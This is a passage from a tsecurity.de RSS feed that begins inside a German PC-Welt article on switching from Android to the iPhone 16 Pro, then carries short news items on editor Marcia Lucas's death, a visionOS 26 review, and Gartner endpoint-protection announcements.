<p>Das hochwertige Design und die hervorragende Verarbeitungsqualität des iPhone 16 Pro haben mich nicht überrascht. Im Vergleich zum <a href="https://www.pcwelt.de/article/2440991/google-pixel-9-pro-vs-pixel-9-pro-xl-was-ist-der-unterschied.html" target="_blank">Pixel 9 Pro</a>, das ich kurz zuvor getestet hatte, ist das 16 Pro bemerkenswert ähnlich. Beide Smartphones haben 6,3-Zoll-Displays und wiegen 199 Gramm.</p>



<p>Es dauerte jedoch nicht lange, bis ich einige wichtige Designunterschiede bemerkte. Vor allem die zusätzlichen Tasten an der Seite. Die meisten Android-Geräte haben nur eine Einschalttaste und eine Lautstärkewippe, aber das iPhone 16 Pro fügt zwei weitere hinzu, mit gemischten Ergebnissen.</p>



<p>Nachdem ich mich an die Platzierung gewöhnt hatte, habe ich die Aktionstaste gerne benutzt. Sie war der perfekte Weg, um den Lautlos-Modus ein- und auszuschalten, kann aber auch zum Auslösen aller möglichen Funktionen verwendet werden, einschließlich des Öffnens einer beliebigen App.</p>



<p>Auf die Kamerasteuerungstaste würde ich allerdings lieber verzichten. Sie ist als Abkürzung für die wichtigsten Kamerafunktionen und als physische Auslösetaste gedacht, aber ich fand sie eher fummelig als funktional. Ich bin sicher, dass ich mich mit der Zeit daran gewöhnen würde, aber ich konnte keinen wirklichen Vorteil gegenüber dem Tippen auf das Display erkennen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/05/Bildschirmfoto-2026-05-27-um-17.53.24.png?w=1024" alt="Die Taste für die Kamerasteuerung" class="wp-image-4177758" width="1024" height="581" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Die Taste für die Kamerasteuerung wurde mehr versehentlich als absichtlich verwendet.</figcaption></figure><p class="imageCredit">Anyron Copeman / Foundry</p></div>



<p>Die Position der Kamerasteuerungstaste verursacht ebenfalls Probleme. Bei Aufnahmen im Querformat ist sie zu weit oben auf dem Smartphone, um leicht zugänglich zu sein, während sie im Hochformat praktisch nutzlos ist. Android-Nutzer, hier verpassen Sie wirklich nichts.</p>



<h2 class="wp-block-heading">Unglaubliche Videos</h2>



<p>Ist das iPhone wirklich das Beste, wenn es um Smartphone-Videos geht? Das iPhone 5 war für die Verhältnisse von 2012 beeindruckend, aber seitdem hat sich viel verändert.</p>



<p>Die gute (oder schlechte, je nachdem, wie Sie es sehen) Nachricht ist, dass das iPhone immer noch die Nase vorn hat. Ich habe inzwischen einige der besten Fotohandys getestet, darunter das <a href="https://www.pcwelt.de/article/2604993/samsung-galaxy-s25-test.html" target="_blank">Samsung Galaxy S25</a> und das <a href="https://www.pcwelt.de/article/2434665/google-pixel-9-pro-xl-testbericht.html" target="_blank">Google Pixel 9 Pro XL</a>. Aber keines kann es mit dem 16 Pro aufnehmen, wenn es um die Videoqualität geht. Die Aufnahmen des Hauptobjektivs sind atemberaubend und bieten die Art von gestochen scharfen Details, akkuraten Farben und fließenden Übergängen, die man normalerweise mit einer speziellen Kameraausrüstung verbindet.</p>



<p>Neuere Modelle wie das <a href="https://www.macwelt.de/article/2915661/iphone-17-pro-max-test.html" target="_blank">iPhone 17 Pro</a> legen die Latte nochmals höher: Drei 48-Megapixel-Kameras, ein neues Teleobjektiv mit 8-fachem optischen Zoom bis 200 mm und <a href="https://www.macwelt.de/article/2970656/iphone-17-pro-video-test-neue-funktionen.html" target="_blank">ProRes RAW mit Log-Encoding</a> machen es laut unabhängigen Tests zu einem der stärksten Smartphone-Kamerasysteme auf dem aktuellen Markt.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/05/Bildschirmfoto-2026-05-27-um-17.53.30.png?w=1024" alt="Phone 16 Pro" class="wp-image-4177760" width="1024" height="578" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Das iPhone 16 Pro ist sowohl für Fotos als auch für Videos hervorragend geeignet.</figcaption></figure><p class="imageCredit">Anyron Copeman / Foundry</p></div>



<p>Die meisten Android-Handys bieten zwar eine gute Videofunktion, aber wenn Sie Ihr Handy nicht nur für den gelegentlichen Gebrauch nutzen möchten, ist das iPhone immer noch die erste Wahl.</p>



<h2 class="wp-block-heading">Fantastische Gesichtserkennung</h2>



<p>In letzter Zeit haben einige Hersteller von Android-Handys endlich begonnen, mit Apples Face ID gleichzuziehen. Insbesondere die Pixel-Modelle von Google und die Honor Magic-Geräte ermöglichen es Ihnen, Ihr Gesicht zur Authentifizierung von Zahlungen und zur Anmeldung bei Banking-Apps zu verwenden.</p>



<p>Apple hat Face ID seit 2017 auf dem iPhone, und das merkt man. Auf dem 16 Pro ist es einfach ein bisschen schneller und zuverlässiger als alle Android-Konkurrenten. Es funktioniert bei praktisch allen Lichtverhältnissen und kann leicht so eingestellt werden, dass es sich entsperrt, während Sie eine Brille oder eine Maske tragen.</p>



<p>Der entscheidende technische Unterschied: Apples Face ID arbeitet mit einem 3D-Tiefensensor, der Tausende unsichtbare Punkte auf das Gesicht projiziert. Die meisten Android-Lösungen nutzen dagegen nur die Frontkamera und lassen sich im schlimmsten Fall mit einem Foto täuschen. Beim iPhone funktioniert das nicht.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/05/Bildschirmfoto-2026-05-27-um-17.53.39.png?w=1024" alt="Face ID" class="wp-image-4177761" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Face ID überzeugt auf ganzer Linie.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Ein Fingerabdrucksensor unter dem Display wäre schön, aber die Tatsache, dass ich ihn überhaupt nicht vermisst habe, spricht Bände. Face ID ist eine weitere Sache, die Apple absolut perfekt hinbekommen hat.</p>



<h2 class="wp-block-heading">iMessage ist leider besser</h2>



<p>Bevor ich auf das 16 Pro umgestiegen bin, habe ich mich zunehmend über Apples wichtigste Messaging-App geärgert. Warum verwenden iPhone-Nutzer nicht einfach Whatsapp? Warum hat Apple so lange gebraucht, um die Android-SMS mit RCS zu verbessern? Und warum gibt es die blaue Blase/grüne Blase überhaupt?</p>



<p>Dann habe ich angefangen, iMessage zu benutzen. iMessage (oder offiziell nur ‘Nachrichten’, wie es auf dem iPhone heißt) ist zweifellos die beste Allround-Messaging-App auf jedem Smartphone.</p>



<p>Sie integriert SMS, MMS und iMessages in einer App und macht es ganz einfach, alles auf einen Blick zu sehen. Sie können es auch so einstellen, dass es alle Textbestätigungscodes automatisch löscht, sobald sie verwendet wurden.</p>



<p>Und selbst wenn Sie keine Internetverbindung haben, können Sie immer noch mit dem gesamten Kontext der gleichen Konversation texten. Wenn Sie wieder online sind, wird alles automatisch gesichert und ist auf allen Ihren Apple-Geräten verfügbar.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/05/Bildschirmfoto-2026-05-27-um-17.53.46.png?w=1024" alt="iMessage" class="wp-image-4177770" width="1024" height="640" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Einmal iMessage benutzt, will man nie mehr zurück.</figcaption></figure><p class="imageCredit">Apple</p></div>



<p>Antworten auf Nachrichten werden besser gehandhabt als bei Whatsapp, denn es wird ein Thread erstellt, anstatt den Chat zu überladen. Sie können auch nahtlos zu einem Facetime-Anruf übergehen, der in der Regel eine bessere Qualität als ein Whatsapp-Anruf bietet.</p>



<p>Apples Bibliothek mit Reaktionen, Stickern und Animationen ist unübertroffen, und Links zu Video- und Audioinhalten werden direkt in der App abgespielt.</p>



<p>In iMessage ist es diese Sammlung von kleinen Aufmerksamkeiten, die das Erlebnis noch ein bisschen besser machen. Ich hätte nie gedacht, dass ich das sagen würde, aber ich mag es vielleicht lieber als Whatsapp.</p>



<h2 class="wp-block-heading">Albtraum der Benachrichtigungen</h2>



<p>Mein größter Kritikpunkt am iPhone ist die Art und Weise, wie es mit Benachrichtigungen umgeht. Ich behaupte nicht, dass Android perfekt ist, wenn es um Benachrichtigungen geht, aber es ist iOS gefühlt Lichtjahre voraus.</p>



<p>Aus irgendeinem Grund scheint Apple der Meinung zu sein, dass Benachrichtigungen <strong>permanent im Benachrichtigungscenter</strong> angezeigt werden sollten. Wenn Sie Ihr Handy entsperren, verschwinden alle Benachrichtigungen vom Sperrbildschirm und erfordern eine halbe Wischbewegung nach oben, um sie aufzurufen. Das macht die Dinge nur unnötig kompliziert.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/05/Bildschirmfoto-2026-05-27-um-17.53.54.png?w=1024" alt="Benachrichtigungen" class="wp-image-4177772" width="1024" height="571" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Sie können mir nicht erzählen, dass das besser ist als Android</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Android macht den Prozess viel einfacher. Alle Ihre Benachrichtigungen werden durchgehend auf dem Sperrbildschirm angezeigt (wenn es zu viele sind, werden deren Symbole unten auf dem Bildschirm angezeigt), von wo aus Sie einfach auf eine tippen können, um sie zu öffnen oder wegzuwischen.</p>



<p>Ich bin auch kein Fan von der Art und Weise, wie iOS Benachrichtigungen aus derselben App in “Stapeln” gruppiert. Sicher, das reduziert das Durcheinander, aber ich muss die Liste sowieso immer erweitern, um den Inhalt der Benachrichtigungen zu sehen. Bei Android liegt eine nützliche Vorschau direkt vor mir.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Ich behaupte nicht, dass Android perfekt ist, wenn es um Benachrichtigungen geht, aber es fühlt sich um Lichtjahre besser an als iOS</p>
</blockquote>



<h2 class="wp-block-heading">Nicht viel Kontrolle im Control Center</h2>



<p>Auch die Verwendung des iOS Control Centers war recht gewöhnungsbedürftig. Stellen Sie sich das Control Center wie das Schnelleinstellungsmenü von Android vor, nur … schlimmer.</p>



<p>Das Design ist kein Problem, ebenso wenig wie die Tatsache, dass Sie von der rechten oberen Ecke des Bildschirms nach unten wischen müssen (was Samsung jetzt kopiert hat). Stattdessen ist mein größtes Problem, dass das Antippen eines der Symbole nicht das tut, was Sie erwarten.</p>



<p>Mindestens einmal am Tag möchte ich zum Beispiel das WLAN ausschalten. In der Regel, <a href="https://www.pcwelt.de/article/2561667/wlan-am-handy-unterwegs-immer-ausschalten-gruende.html" target="_blank">wenn ich auf dem Weg nach draußen bin</a>. Aber auf dem iPhone 16 Pro lässt sich das WLAN durch Antippen des Symbols nicht dauerhaft deaktivieren. Stattdessen erscheint die Meldung “WLAN in der Nähe wird bis morgen getrennt”. Das Gerät verbindet sich also am nächsten Tag automatisch wieder. Das Gleiche gilt für Bluetooth.</p>



<p>Traut Apple mir wirklich nicht zu, dass ich daran denke, das WLAN wieder zu aktivieren? Nennen Sie mich altmodisch, aber ich würde das gerne selbst steuern können, indem ich das ‘Control Center’ verwende.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/05/Bildschirmfoto-2026-05-27-um-17.54.03.png?w=1024" alt="Control Center" class="wp-image-4177774" width="1024" height="585" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Control Center: Ein klares Nein von mir.</figcaption></figure><p class="imageCredit">Anyron Copeman / Foundry</p></div>



<h2 class="wp-block-heading">Schmerzhaft langes Aufladen</h2>



<p>Das ist kein Problem, das nur beim iPhone auftritt, aber es war ein ziemlicher Schock, als ich umstieg. Das iPhone 16 Pro ist ein Flaggschiff-Handy, das bei der Markteinführung mindestens 1.199 Euro gekostet hat, aber leider nur mit bis zu 25 Watt geladen werden kann.</p>



<p>Wenn Sie schon einmal die Freuden einer echten Schnellladung erlebt haben, wissen Sie, wie frustrierend das ist. Selbst wenn Sie ein kompatibles Netzteil finden (es ist keines im Lieferumfang enthalten), dauert der Ladevorgang ewig.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/05/Bildschirmfoto-2026-05-27-um-17.54.07.png?w=1024" alt="USB-C" class="wp-image-4177775" width="1024" height="585" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Das Aufladen erfolgt jetzt über USB-C, zumindest</figcaption></figure><p class="imageCredit">Anyron Copeman / Foundry</p></div>



<p>Beim iPhone 17 Pro hat Apple nachgebessert: Dessen maximale Ladegeschwindigkeit liegt bei 40 Watt. Apple verspricht 50 Prozent in 20 Minuten mit einem passenden Netzteil, was deutlich mehr ist als beim Vorgänger (aber immer noch weit von dem entfernt, was Android-Flaggschiffe mit 80 oder 100 Watt bieten).</p>



<h2 class="wp-block-heading">Mein Urteil über das iPhone</h2>



<p>Der Umstieg auf das iPhone 16 Pro brachte mehr Überraschungen mit sich, als ich erwartet hatte … im Guten wie im Schlechten.</p>



<p>Obwohl sie sich ähnlicher sind als je zuvor, unterscheiden sich iOS und Android immer noch in einigen grundlegenden Punkten. Wenn Sie nicht mit beiden vertraut sind, ist der Umstieg in beiden Fällen mit einer erheblichen Lernkurve verbunden.</p>



<p>Als jemand, der beruflich Mobilgeräte testet und hauptsächlich Google-Apps verwendet, ist Android für mich im Moment die bessere Wahl. Aber ich weiß einige der Möglichkeiten zu schätzen, mit denen Apple das iPhone zu einem so überzeugenden Gerät macht, insbesondere wenn Sie bereits andere Produkte des Unternehmens besitzen.</p>



<p>Trotz des Vorwurfs mangelnder Innovation hat das iPhone in den 12 Jahren, die ich weg war, einen verdammt langen Weg zurückgelegt. Die neuesten Modelle sind zweifellos immer noch einige der <a href="https://www.pcwelt.de/article/1924183/das-beste-smartphone-im-test.html" target="_blank">besten Smartphones</a>, die Sie kaufen können.</p>



<p>(<a href="https://www.pcwelt.de/article/2652810/nach-ueber-12-jahren-android-wechsle-ich-zum-iphone-das-lernte-ich-dabei.html" data-type="link" data-id="https://www.pcwelt.de/article/2652810/nach-ueber-12-jahren-android-wechsle-ich-zum-iphone-das-lernte-ich-dabei.html" target="_blank">PC-Welt</a>)</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[RIP: Marcia Lucas, Oscar-Winning Star Wars Editor, Dies At 80]]></title>
<description><![CDATA[```Long-time Slashdot reader schwit1 brings word that Marcia Lucas, part of the editing team for both Star Wars and Return of the Jedi, has died at age 80 after a battle with metastatic cancer. 

Married to George Lucas from 1969 to 1983, Marcia is remembered by The Wrap as "a powerful asset in t...]]></description>
<link>https://tsecurity.de/de/3558282/it-security-nachrichten/rip-marcia-lucas-oscar-winning-star-wars-editor-dies-at-80/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3558282/it-security-nachrichten/rip-marcia-lucas-oscar-winning-star-wars-editor-dies-at-80/</guid>
<pubDate>Sat, 30 May 2026 05:34:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[```Long-time Slashdot reader schwit1 brings word that Marcia Lucas, part of the editing team for both Star Wars and Return of the Jedi, has died at age 80 after a battle with metastatic cancer. 

Married to George Lucas from 1969 to 1983, Marcia is remembered by The Wrap as "a powerful asset in the early days of the Star Wars series, helping shape its voice and identity long before it became the massive global franchise..."

She won an Academy Award for Best Film Editing for her work on the original "Star Wars" movie, an award that came four years after she was nominated for editing George's previous film, "American Graffiti." She additionally edited his debut feature, "THX 1138." Beyond these collaborations with her then-husband, Marcia worked as an editor with other acclaimed filmmakers like Martin Scorsese and Francis Ford Coppola. She was credited as sole editor for Scorsese's "Alice Doesn't Live Here Anymore," and served as supervising editor for "Taxi Driver" and "New York, New York." 

Marcia served as part of a three-person crew editing both "Star Wars" and "Return of the Jedi." On the first film, she worked alongside Paul Hirsch and Richard Chew and was personally responsible for editing the Battle of Yavin — otherwise known as the iconic "trench run" sequence near the end of the film. For "Return of the Jedi," Marcia shared credit with Sean Barton and Duwayne Dunham. 

"If only Lucas had people like her on the prequels instead of sycophants who worshipped him as a God..." argues this 2015 blog post noting an article calling her "the secret weapon behind Star Wars — including this anecdote from The Secret History of Star Wars :

The [Star Wars] Death Star trench run was originally scripted entirely different, with Luke having two runs at the exhaust port; Marcia had re-ordered the shots almost from the ground up, trying to build tension lacking in the original scripted sequence, which was why this one was the most complicated (Deleted Magic has a faithful reproduction of the original assembly, which is surprisingly unsatisfying). 

She warned George, "If the audience doesn't cheer when Han Solo comes in at the last second in the Millennium Falcon to help Luke when he's being chased by Darth Vader, the picture doesn't work." 


Thanks to long-time Slashdot reader schwit1 for sharing the news.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=RIP%3A+Marcia+Lucas%2C+Oscar-Winning+Star+Wars+Editor%2C+Dies+At+80%3A+https%3A%2F%2Fentertainment.slashdot.org%2Fstory%2F26%2F05%2F30%2F0246210%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fentertainment.slashdot.org%2Fstory%2F26%2F05%2F30%2F0246210%2Frip-marcia-lucas-oscar-winning-star-wars-editor-dies-at-80%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://entertainment.slashdot.org/story/26/05/30/0246210/rip-marcia-lucas-oscar-winning-star-wars-editor-dies-at-80?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The last visionOS 26 review: Apathy about Apple Vision Pro on display]]></title>
<description><![CDATA[Apple Vision Pro isn't a priority product for Apple's teams, and it shows in the development of visionOS 26. Bug fixes, minor adjustments, and nearly zero feature additions define the year.visionOS 26 review: it hasn't been touched in a year which means WWDC better deliverWhen visionOS 26 was rev...]]></description>
<link>https://tsecurity.de/de/3557924/ios-mac-os/the-last-visionos-26-review-apathy-about-apple-vision-pro-on-display/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3557924/ios-mac-os/the-last-visionos-26-review-apathy-about-apple-vision-pro-on-display/</guid>
<pubDate>Sat, 30 May 2026 01:18:56 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple Vision Pro isn't a priority product for Apple's teams, and it shows in the development of <a href="https://appleinsider.com/inside/visionos-26" title="visionOS 26" data-kpt="1">visionOS 26</a>. Bug fixes, minor adjustments, and nearly zero feature additions define the year.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67582-142803-Apple-Vision-Pro-countertop-xl.jpg" alt="Apple Vision Pro resting on a wooden table beside a slim rectangular battery pack connected by a cable, in a softly lit home setting with blurred background" height="738"><br><span>visionOS 26 review: it hasn't been touched in a year which means WWDC better deliver</span></div><br>When visionOS 26 was revealed, it was clear that new hardware would be <a href="https://appleinsider.com/articles/25/09/13/visionos-26-review-a-necessary-evolution-in-need-of-new-hardware">crucial for the platform</a>. Then the M5 model arrived, and <a href="https://appleinsider.com/articles/25/11/05/apple-vision-pro-with-m5-review-a-chip-cant-fix-developer-relations">it was better</a>, but nothing else changed in the time since.<br><br>I'm sitting here typing this on the <a href="https://appleinsider.com/inside/apple-vision-pro" title="Apple Vision Pro" data-kpt="1">Apple Vision Pro</a> connected to a Bluetooth mechanical keyboard and Apple Magic Trackpad. It's been over two years since I used the original model, and yet, it still feels magical.<br><br><br> <a href="https://appleinsider.com/articles/26/05/29/the-last-visionos-26-review-apathy-about-apple-vision-pro-on-display?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244475?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[CrowdStrike Named a Leader in 2026 Gartner&reg; Magic Quadrant&trade; for Endpoint Protection for Seventh Consecutive Time]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3557748/it-security-nachrichten/crowdstrike-named-a-leader-in-2026-gartnerreg-magic-quadranttrade-for-endpoint-protection-for-seventh-consecutive-time/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3557748/it-security-nachrichten/crowdstrike-named-a-leader-in-2026-gartnerreg-magic-quadranttrade-for-endpoint-protection-for-seventh-consecutive-time/</guid>
<pubDate>Sat, 30 May 2026 01:13:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Microsoft is named a Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection]]></title>
<description><![CDATA[Microsoft is named a Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection.
The post Microsoft is named a Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection appeared first on Microsoft Security Blog.]]></description>
<link>https://tsecurity.de/de/3557595/it-security-nachrichten/microsoft-is-named-a-leader-in-the-2026-gartner-magic-quadrant-for-endpoint-protection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3557595/it-security-nachrichten/microsoft-is-named-a-leader-in-the-2026-gartner-magic-quadrant-for-endpoint-protection/</guid>
<pubDate>Sat, 30 May 2026 01:10:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft is named a Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection.</p>
<p>The post <a href="https://www.microsoft.com/en-us/security/blog/2026/05/29/microsoft-is-named-a-leader-in-the-2026-gartner-magic-quadrant-for-endpoint-protection/">Microsoft is named a Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection</a> appeared first on <a href="https://www.microsoft.com/en-us/security/blog">Microsoft Security Blog</a>.</p>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,45ms -->